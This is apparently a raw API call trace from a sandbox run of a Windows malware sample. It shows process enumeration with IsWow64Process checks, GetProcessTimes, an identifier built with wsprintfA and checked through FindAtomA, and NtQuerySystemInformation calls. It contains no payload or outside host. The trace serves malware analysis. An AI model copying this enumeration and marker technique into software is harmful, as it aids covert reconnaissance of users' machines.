	[0072.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.387] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.387] CloseHandle (hObject=0x224) returned 1
	[0072.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.387] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.387] CloseHandle (hObject=0x224) returned 1
	[0072.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.388] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.388] CloseHandle (hObject=0x224) returned 1
	[0072.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.388] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.388] CloseHandle (hObject=0x224) returned 1
	[0072.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.388] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.388] CloseHandle (hObject=0x224) returned 1
	[0072.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.388] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.388] CloseHandle (hObject=0x224) returned 1
	[0072.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728a38, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.389] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.389] CloseHandle (hObject=0x224) returned 1
	[0072.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728a98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.389] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.389] CloseHandle (hObject=0x224) returned 1
	[0072.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.389] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.389] CloseHandle (hObject=0x224) returned 1
	[0072.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.390] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.390] CloseHandle (hObject=0x224) returned 1
	[0072.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72eab8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.390] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.390] CloseHandle (hObject=0x224) returned 1
	[0072.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7289b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.390] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.390] CloseHandle (hObject=0x224) returned 1
	[0072.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.390] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.390] CloseHandle (hObject=0x224) returned 1
	[0072.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.390] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.391] CloseHandle (hObject=0x224) returned 1
	[0072.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0072.391] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.391] CloseHandle (hObject=0x224) returned 1
	[0072.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7289f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.391] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.391] CloseHandle (hObject=0x224) returned 1
	[0072.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.391] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.391] CloseHandle (hObject=0x224) returned 1
	[0072.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.391] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.391] CloseHandle (hObject=0x224) returned 1
	[0072.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e888, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.391] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.392] CloseHandle (hObject=0x224) returned 1
	[0072.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.392] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.392] CloseHandle (hObject=0x224) returned 1
	[0072.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.392] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.392] CloseHandle (hObject=0x224) returned 1
	[0072.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.392] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.392] CloseHandle (hObject=0x224) returned 1
	[0072.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.392] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.392] CloseHandle (hObject=0x224) returned 1
	[0072.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7288b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.392] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.393] CloseHandle (hObject=0x224) returned 1
	[0072.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.393] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.393] CloseHandle (hObject=0x224) returned 1
	[0072.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.393] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.393] CloseHandle (hObject=0x224) returned 1
	[0072.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.393] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.394] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.394] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.394] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.395] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetLastError () returned 0x5
	[0072.396] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.396] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.396] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.397] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.397] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.397] CloseHandle (hObject=0x224) returned 1
	[0072.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.397] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.397] CloseHandle (hObject=0x224) returned 1
	[0072.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eb30, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.397] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.397] CloseHandle (hObject=0x224) returned 1
	[0072.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16d68) returned 0xc0000004
	[0072.429] VirtualAlloc (lpAddress=0x0, dwSize=0x16e68, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16e68, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
